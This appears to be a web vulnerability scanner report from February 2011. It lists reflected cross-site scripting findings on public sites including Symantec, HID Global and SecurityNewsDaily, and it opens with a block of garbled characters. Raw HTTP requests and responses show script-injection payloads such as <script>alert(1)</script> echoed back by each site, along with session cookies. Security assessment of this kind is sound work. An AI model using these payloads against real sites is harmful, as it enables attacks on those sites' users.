q41w3q31w3pz1w3py0r083ik5120o0pk2n0kh4b0kh4a0kh490kh430kh3z0kh3y0kh3x0kh3v0kh3u0kh3t0kh3s0kh3r0kh3p0kh3m0kh3l0kh3j0kh3h0kh3g0kh3f0kh3d0kh3a0kh390keqa4nssk122m1c4wn1bw5j1bw5i1bw5g1bw5f1bw5e1bw5d1bw5b1bw5a1bw591bw561bw551bw541bw531bw521bw511bw501bw4z1bw4y1bw4x1bw4w1bw4u1bw4t1bw4s1bw4r1bw4q1bw4p1bw4o1bw4n1bw4l1bw4j1bw4i1bw4h1bw4g1bw4f1bw4e1bw4c1bw4b1bw4a1bw491bw481bw471bw461bw451bw441bw431bw421bw401bw3z1bw3x1bw3w1bw3v1bw3u1bw3t1bw3s1bw3r1bw3q1bw3p1bw3n1bw3m1bw3l1bw3k1bw3f1bw3e1bw3c1bw3b1bw3a1bw381bw361bw351bw341bw331bw321bw311bw301bw2z1bw2w1bw2v1bw2u1bw2t1bw2s1bw2r1bw2q1bw2p1bw2o1bw2n1bw2m1bw2l1bw2k1bw2j1bw2i1bw2c1bw2b1boph4l2ch12012aocm4u0e31202259612595p32te12021xgde1xg0o38c912012707l4jaec12021udrn1ucve3sti120326v3926uvg26uuv0s018raevpblc12011xh931p028VgwGdHhN1101254098BreszClF110v254102540z2540y2540x2540w2540u2540t2540s2540r2540q2540p2540n2540m2540l2540h2540g2540f2540d2540c2540b2540a254062540525404254032540225401253zz253zy253zx253yz1o018EstvP2qn112s1oa941oa931oa921oa911oa8z1oa8v1oa8u1oa8t1oa8s1oa8q1oa8p1oa8o1oa8n1oa8m1oa8l1oa8j1oa8i1oa8h1oa8g1oa8f1oa8e1oa8d1oa8c1oa8b1oa891oa881oa871oa841oa831oa821oa811oa801oa7y1oa7x1oa7w1oa7v1oa7u1oa7t1oa7s1oa7o1oa7n1oa7l1oa7k1oa7j1oa7i1oa7h1oa7g1oa7f1oa7e1oa7d1oa7b1oa7a1oa791oa781oa771oa761oa751oa741oa731oa721oa701oa6z1oa6y1oa6x1oa6w1oa6v1oa6u1oa6t1oa6o1oa6n1oa6m1oa6l1oa6k1oa6j1oa6h1oa6g1oa6f1oa6e1oa691oa681oa651oa641oa631oa611oa601oa5z1oa5y1oa5w1oa5v1oa5t1oa5s1oa5r1oa5q1oa5m1oa5l1oa5k1oa5j1oa5i1oa5h1o9ct

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh="1lf17qo16063w0s0103r01sZshBH2Om01l7sh3t2a012fr01PosQJERns01jx8p3w0t012e301OdygJLiOt01jvcj3e7s0103901WEF/RAmuh01bly126030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2lebnns011706ch47d7o8wtv2arvd0231903080621a; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 19:01:53 GMT; Path=/
Set-Cookie: orblb=2lfk1rn042ct10u010wryf26x10u010tn5625810u020lxik0hlmv2dh10u0100000; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 19:01:53 GMT; Path=/
Set-Cookie: rdrlst=4350ojdlggtq20000000h190311gvlggtq20000000h19030yujlginvd0000000e19030jv3lginvd0000000e19030e0flggrmr0000000i19030x1blebnns1wj3q01411000yielginvd0000000e19030yiflginvd0000000e19030oj6lggtq20000000h19030e08lggtq20000000h190310qflginvq0000000d19030e0nlgevbm0000000k19030w3clebnns1wj3q01411000jv6lebnns1wj3q01411000jv5lggtq20000000h19030j4ilew2e20000001x19030khalggtq20000000h19031196lfzx0l0000001a19031195lg7rdq0000001119030jillebnns1wj3q01411001194lg3y5y0000001719030z14lggtq20000000h19030zgdlggtq20000000h19030faalggtq20000000h19030z13lgio080000000819031193lgiiin0000000f19031192lg5l2h0000001619030jprlginvd0000000e19030w2klggtq20000000h19030yh0lebnns1wj3q01411000jwblfk1rn0o4zv00p110007dpletz4d0000001z19030mmnlebnns1wj3q01411000xwhlggtq20000000h19031004lginvd0000000e19030z02lggtq20000000h19030kbzlggtq20000000h19030z01lgmbyu0000000319030eh5lf17qf0000001v19030kkclggtq20000000h190306bylemlne0000002119030df5lgcqt50000000p1903111xlggtq20000000h19030mn2lginvd0000000e19030mn1lginvd0000000e19030swvlggtq20000000h1903100plggtq20000000h19030im3lgcqt50000000p19030yzflgmc0e0000000219020yzglginxj0000000b19030b6mlf17qk0000001u19030y63lg93og0000000u19030xvslebnns1wj3q01411000o5alggtq20000000h19030yyxlginvu0000000c19030yywlginzk0000000919030x1jlebnns1wj3q01411000xwclginvd0000000e19030o4plginvd0000000e19030yiplebnns1wj3q01411000xwflebnns1wj3q01411000e4vlebnns1wj3q01411000xwblebnns1wj3q01411000o2ylebnns1wj3q01411000xo1lebnns1wj3q01411000hw7lggtq20000000h19030yyelginyj0000000a19030fullf8gij0000001r190310f6lg1nei00000019190300c9lfk1rn0000001o19030y7blg94wv0000000s19030jsalggtq20000000h190306pklginvd0000000e19030cajlfk1rn0000001o19030p7vlebnns1xgc001b120010tylg60ji00000012190310ellg1nei07gla00h120010eklggtq20000000h19030xuklebnns22191023190311k3lginvd0000000e190310telg60j600000014190310e9lg1nei0000001919030xtblggtq20000000h190310e2lggtq20000000h19030mivlgismk0000000719030yw4lggtq20000000h190310e4lginvd0000000e190310e5lg1nei0jfph015180010rdlg1vir087mk01819030xt3lggtq20000000h19030mzklgcsh70000000n19030agalggtq20000000h19030agblggtq20000000h19030mzqlgcsgy0000000o19030loxlginvd0000000e190307gmlebnns1wj3q01411000kfalginvd0000000e19030xthlebnns1xgc001b12000xtflggtq20000000h19030za2lginvd0000000e19030za1lginvd0000000e190307gqlggtq20000000h19030ovwlginvd0000000e19030lw4lginvd0000000e19030fuqlegh2b0000002219030lw3lggtq20000000h19030l24lginvd0000000e19030mz1lebnns1wj3q01411000l25lggtq20000000h190307vglfk1rn0tn5601o19030jk7lebnns1wj3q01411000cbnlfk1rn0tn5601o19030e11lggwth0000000g1903; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 19:01:53 GMT; Path=/
Set-Cookie: sglst=21m0s8dtlggrmr01w8m00i1903080620i8kmlggrmr01w8m00i1903080620iavtlggrmr0056q00i1903080620i82hlebnns1ucve00z10000600200avjlggrmr01w8m00i1903080620i3kilggrmr01w8m00i1903080620ialhlggrmr01w8m00i1903080620i9bslggrmr01w8m00i1903080620iab4lebnns2707l0231903080621a81zlggrmr0056q00i1903080620i8gxlggrmr0056q00i1903080620i81ylginvd0000000e1903080620e8gwlginvd0000000e1903080620eaoklggrmr0056q00i1903080620iaollginvd0000000e1903080620eb07lggwth01r1w00g1903080620g7inlginvd0000000e1903080620e8nclginvd0000000e1903080620eb05lggrmr01w8m00i1903080620ial1lggrmr01w8m00i1903080620ibbhlggrmr01w8m00i1903080620i8wylginvd0000000e1903080620eb0clfjpei0yygv01p1903080621a8wxlggrmr0056q00i1903080620i72slggtq205lt300h1903080620hahhlginvd0000000e1903080620e8nblggrmr0056q00i1903080620iahilggrmr0056q00i1903080620i7gdlgcqt509oq000p1903080620pb08lfjpei0yygv01b1700070020040ulggrmr01w8m00i1903080620iaprlggrmr01w8m00i1903080620i5l4lgcqt509oq000p1903080620paanlebnns1xg0o00o120007002008aelggrmr0056q00i1903080620i474lgl4zd000000041903080420461hlggrmr01w8m00i1903080620i5b0lf17qo0000001t1903080621aag2leqh191vyhw0201903080621a3thlggrmr01w8m00i1903080620i8c9lggrmr0056q00i1903080620i9z4lggrmr01w8m00i1903080620iacjlggrmr01w8m00i1903080620ib1alfjpei0yygv01p1903080621a9mmlggrmr0056q00i1903080620ib0nlggrmr01w8m00i1903080620ib0olfjpei0pe9y00v120007002009szlebnns1xg0o01912000700200802lggrmr01w8m00i1903080620i4zqlgl33701cfy006190308062060tllegh2b25ygu0221903080621a9cblggrmr0056q00i1903080620i8bglginvd0000000e1903080620e4wmlggrmr01w8m00i1903080620i5q8lebnns1ucve00k10000600200acelggrmr01w8m00i1903080620i45mlfdxmc0000001q1903080621abhdlginvd0000000e1903080620e; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 19:01:53 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 14 Feb 2011 19:01:53 GMT
Content-Length: 1080

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.Media6/B3897970.8;sz=728x90;click0=http://ad.media6degrees.com/adserv/clk?tId=12497909247337382|cId=3211|cb=1297710111|notifyPort=8080|exId=20|tId=1249
...[SNIP]...
dChkb2N1bWVudC5jb29raWUpLSc5ZjlhMmUzNjk3NC-YAp4KwAIFyALR0c8MqAMB6AOdCegD4gXoA7sC6AO6AvUDAAAAxPUDEAAAAA%26num%3D1%26sig%3DAGiWqtzWDWiQGS9YdY2V3Kkt29cplZ3pbA%26client%3Dca-pub-1894578950532504%26adurl%3D4920f"><script>alert(1)</script>f43e222c996;ord=1297710113743?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0

MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
...[SNIP]...

2.3. https://www-secure.symantec.com/connect/symantec_symaccount [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www-secure.symantec.com
Path:   /connect/symantec_symaccount

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88e60'-alert(1)-'72d4beaeb8b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/symantec_symaccount88e60'-alert(1)-'72d4beaeb8b?profileURL=https%3A%2F%2Fsymaccount-profile.symantec.com%2FSSO%2Findex.jsp%3FssoID%3D1297710255984zLG9Ht01OE8Lpk2m7u68K6G69r7hE3181J0hD HTTP/1.1
Host: www-secure.symantec.com
Connection: keep-alive
Referer: https://symaccount.symantec.com/SymAccount/index.jsp?returnURL=https%3A%2F%2Fwww-secure.symantec.com%2Fconnect%2Fsymantec_symaccount
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=123259657.1297710221.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26ACBE3E050135F4-4000010880054D66[CE]; __utma=123259657.27213714.1297710221.1297710221.1297710221.1; __utmc=123259657; __utmv=123259657.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=123259657.4.10.1297710221; s_pers=%20s_nr%3D1297710257466-New%7C1318446257466%3B%20event69%3Devent69%7C1318446257467%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasconnect%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520connect%2525253A%25252520allconnct%2525253A%25252520overview%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%2525252Fuser%2525252Fregister%252526ot%25253DA%3B; s_cc=true; s_sq=symantecmysymantec%2Cveritasnonconsumer%3D%2526pid%253Dbiz%25253A%252520symaccount%25253A%252520member%252520login%2526pidt%253D1%2526oid%253Djavascript%25253Adocument.profile.submit%252528%252529%25253B%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:35:28 +0000
Vary: Cookie
ETag: "1297712128"
Content-Type: text/html; charset=utf-8
Expires: Mon, 14 Feb 2011 19:35:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 14 Feb 2011 19:35:29 GMT
Connection: keep-alive
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 33548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/connect/symantec_symaccount88e60'-alert(1)-'72d4beaeb8b?profileURL=https%3A%2F%2Fsymaccount-profile.symantec.com%2FSSO%2Findex.jsp%3FssoID%3D1297710255984zLG9Ht01OE8Lpk2m7u68K6G69r7hE3181J0hD';
var symaccount_base_url = 'https://symaccount.symantec.com/'
...[SNIP]...

2.4. http://www.hidglobal.com/onlineOrderStatusRegistration.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hidglobal.com
Path:   /onlineOrderStatusRegistration.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4e99e--><script>alert(1)</script>0d66908170c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /onlineOrderStatusRegistration.php?4e99e--><script>alert(1)</script>0d66908170c=1 HTTP/1.1
Host: www.hidglobal.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=10140716.1297708154.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=kr9b485jm7dv1f9g8un99oala4; __utma=10140716.584761103.1297708154.1297708154.1297708154.1; __utmc=10140716; __utmb=10140716.2.10.1297708154; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26ACBA4A851D330C-6000012840002166[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:30:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<onlineOrderStatusRegistration.php?4e99e--><script>alert(1)</script>0d66908170c=1'>
...[SNIP]...

2.5. http://www.hidglobal.com/onlineOrderStatusRegistration.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hidglobal.com
Path:   /onlineOrderStatusRegistration.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a9f34'><script>alert(1)</script>43e4407fe64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /onlineOrderStatusRegistration.php?a9f34'><script>alert(1)</script>43e4407fe64=1 HTTP/1.1
Host: www.hidglobal.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=10140716.1297708154.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=kr9b485jm7dv1f9g8un99oala4; __utma=10140716.584761103.1297708154.1297708154.1297708154.1; __utmc=10140716; __utmb=10140716.2.10.1297708154; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26ACBA4A851D330C-6000012840002166[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:30:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<option value='onlineOrderStatusRegistration.php?a9f34'><script>alert(1)</script>43e4407fe64=1'>
...[SNIP]...

2.6. http://www.hidglobal.com/page.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hidglobal.com
Path:   /page.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a81b4'><script>alert(1)</script>2385ca69c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page.php?page_id=223&a81b4'><script>alert(1)</script>2385ca69c8=1 HTTP/1.1
Host: www.hidglobal.com
Proxy-Connection: keep-alive
Referer: http://www.hidglobal.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=10140716.1297708154.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=10140716.584761103.1297708154.1297708154.1297708154.1; __utmc=10140716; __utmb=10140716.1.10.1297708154; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:29:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=ee3pj3sjmfnm9u1buvef1fkph3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22119


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...
<option value='page.php?page_id=223&a81b4'><script>alert(1)</script>2385ca69c8=1'>
...[SNIP]...

2.7. http://www.hidglobal.com/page.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hidglobal.com
Path:   /page.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 38017--><script>alert(1)</script>8a47ebd32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /page.php?page_id=223&38017--><script>alert(1)</script>8a47ebd32=1 HTTP/1.1
Host: www.hidglobal.com
Proxy-Connection: keep-alive
Referer: http://www.hidglobal.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=10140716.1297708154.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=10140716.584761103.1297708154.1297708154.1297708154.1; __utmc=10140716; __utmb=10140716.1.10.1297708154; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:29:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=fua5t5i63b7cdurr8ia8ts0t83; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22119


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...
<page.php?page_id=223&38017--><script>alert(1)</script>8a47ebd32=1'>
...[SNIP]...

2.8. http://www.hidglobal.com/page.php [page_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hidglobal.com
Path:   /page.php

Issue detail

The value of the page_id request parameter is copied into an HTML comment. The payload f7990--><script>alert(1)</script>3373238299 was submitted in the page_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /page.php?page_id=223f7990--><script>alert(1)</script>3373238299 HTTP/1.1
Host: www.hidglobal.com
Proxy-Connection: keep-alive
Referer: http://www.hidglobal.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=10140716.1297708154.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=10140716.584761103.1297708154.1297708154.1297708154.1; __utmc=10140716; __utmb=10140716.1.10.1297708154; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:29:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=b9144vmef03vo7gebh794ru3n1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20814


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...
<page.php?page_id=223f7990--><script>alert(1)</script>3373238299'>
...[SNIP]...

2.9. http://www.hidglobal.com/page.php [page_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hidglobal.com
Path:   /page.php

Issue detail

The value of the page_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 18911'><script>alert(1)</script>194314eb54d was submitted in the page_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page.php?page_id=22318911'><script>alert(1)</script>194314eb54d HTTP/1.1
Host: www.hidglobal.com
Proxy-Connection: keep-alive
Referer: http://www.hidglobal.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=10140716.1297708154.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=10140716.584761103.1297708154.1297708154.1297708154.1; __utmc=10140716; __utmb=10140716.1.10.1297708154; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:29:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=vt0ckkgs4dasmpv9nf3c4srqs4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20814


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...
<option value='page.php?page_id=22318911'><script>alert(1)</script>194314eb54d'>
...[SNIP]...

2.10. http://www.securitynewsdaily.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.securitynewsdaily.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6efdb'-alert(1)-'cf92265efad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /6efdb'-alert(1)-'cf92265efad HTTP/1.1
Host: www.securitynewsdaily.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a5e04250348ef9239c1cdf4824f43ad1=rdrk740li51o2pdl7k6r41odm1; __qca=P0-1506324868-1297709851878; __utmz=27158498.1297709852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); reaction_28=1; __utma=27158498.1497794322.1297709852.1297709852.1297709852.1; __utmc=27158498; __utmb=27158498.2.10.1297709852

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:58:06 GMT
Server: Apache
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 14 Feb 2011 18:58:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.securitynewsdaily.com/6efdb'-alert(1)-'cf92265efad",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

2.11. http://www.securitynewsdaily.com/media/system/twittertweeter.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.securitynewsdaily.com
Path:   /media/system/twittertweeter.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c889f</script>b9771edadf3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

